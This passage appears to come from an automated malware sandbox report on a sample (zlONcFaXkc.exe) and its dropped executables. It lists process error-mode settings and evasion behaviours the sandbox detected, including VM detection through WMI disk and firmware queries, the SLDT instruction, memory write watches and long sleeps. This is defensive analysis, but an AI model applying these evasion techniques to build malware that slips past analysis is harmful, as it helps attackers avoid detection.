Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

System information queried: FirmwareTableInformation

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Memory allocated: 1DFA7BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Memory allocated: 1DFC1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory allocated: 1D099EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory allocated: 1D0B36C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Memory allocated: 2A5B9950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Memory allocated: 2A5D3550000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Code function: 1_2_00007FFD9B8B31D4 sldt word ptr [eax]

1_2_00007FFD9B8B31D4

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199955	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1198910	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599886	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599777	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598761	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598652	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597543	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Window / User API: threadDelayed 3692			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Window / User API: threadDelayed 6002			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\zlONcFaXkc.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59871s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -58999s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7388	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1199955s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1199828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1199718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1198910s >= -30000s	Jump to behavior
